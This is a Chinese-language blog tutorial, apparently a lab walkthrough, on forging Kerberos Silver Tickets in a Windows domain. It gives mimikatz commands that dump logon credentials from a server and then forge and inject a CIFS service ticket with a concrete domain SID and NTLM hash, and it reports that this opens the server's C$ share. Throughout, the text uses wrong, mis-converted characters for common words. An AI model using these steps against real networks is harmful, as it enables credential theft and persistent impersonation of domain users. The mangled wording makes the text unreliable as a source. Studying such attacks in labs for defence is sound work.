域滲透 | 白銀票據利用

目錄

0x01 介紹

0x02 白銀票據利用

0x01 介紹

以前，咱們已經詳細說過Kerberos認證的流程，此次咱們就來講說如何對其進行利用，此次主要說的是白銀票據僞造（Silver Tickets）

白銀票據僞造利用的是Kerberos認證中的第三個步驟，在第三步的時候，client會帶着ticket向server的某個服務進行請求，若是驗證經過就能夠訪問server上的指定服務了，這裏ticket的格式是這樣的：

Server hash(server session key + client info + end time)

其中client info咱們是很清楚的，end time也能夠根據本身當前的時間進行僞造，server session key是TGS生成的，在未向server發送ticket的時候，server也是不知道server session key是什麼的，因此只要咱們知道server hash就能夠去訪問server中的指定服務了。

其實與其說這是一種利用方式，倒不如說這是一個後門，在擁有server hash的時候，能夠隨時去請求server。

根據上面的攻擊流程總結如下白銀票據的攻擊特色：

1.不須要與KDC進行交互

2.須要server的NTLM hash

0x02 白銀票據利用

DC 192.168.6.112

Client 192.168.6.113
WIN7-CLIENT.zhujian.com

Server 192.168.6.114
WIN7-SERVER.zhujian.com

這裏咱們使用文件共享的方式來進行驗證

輸入\\WIN7-SERVER.zhujian.com\c$進行驗證

發現須要輸入密碼才能進行鏈接

而後咱們使用mimikatz去Server中導出hash

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit">log.txt

能夠發現已經獲取到了hash等各類信息

而後回到client中使用mimikatz來僞造票據

命令以下

mimikatz "kerberos::golden /domain:<域名> /sid:<域 SID> /target:<目標服務器主機名> /service:<服務類型> /rc4:<NTLMHash> /user:<用戶名> /ptt" exit

其中的信息能夠這樣得到

SID不須要填最後的 -500

注：這裏的目標服務器主機名不能用這裏hostname的內容，而是要寫全稱

服務類型能夠從如下內容中來進行選擇，由於咱們沒有TGT去不斷申請ticket，因此只能針對某一些服務來進行僞造

其中的用戶名能夠隨便寫，這個是不受影響的，由於在數據傳過去以前server是不知道用戶名的，對於傳輸流程還不太熟悉的，能夠移步《Windows認證 | 域認證》

因此最後獲得的信息是這樣的

mimikatz.exe "kerberos::golden /domain:zhujian.com /sid:S-1-5-21-829259175-2571685386-1296789624 /target: WIN7-SERVER.zhujian.com /service:cifs /rc4:e467173f3c80e9f23084396625486f60 /user: secquan /ptt" exit

而後再一次進行測試

已經能夠成功訪問了

若是對Windows認證有興趣的能夠看一下下面的幾篇文章來學習一下《Windows認證 | Windows本地認證》、《Windows認證 | 網絡認證》、《Windows認證 | 域認證》、《SPN掃描》、《Kerberoasting攻擊》

本文由博客一文多發平臺 OpenWrite 發佈！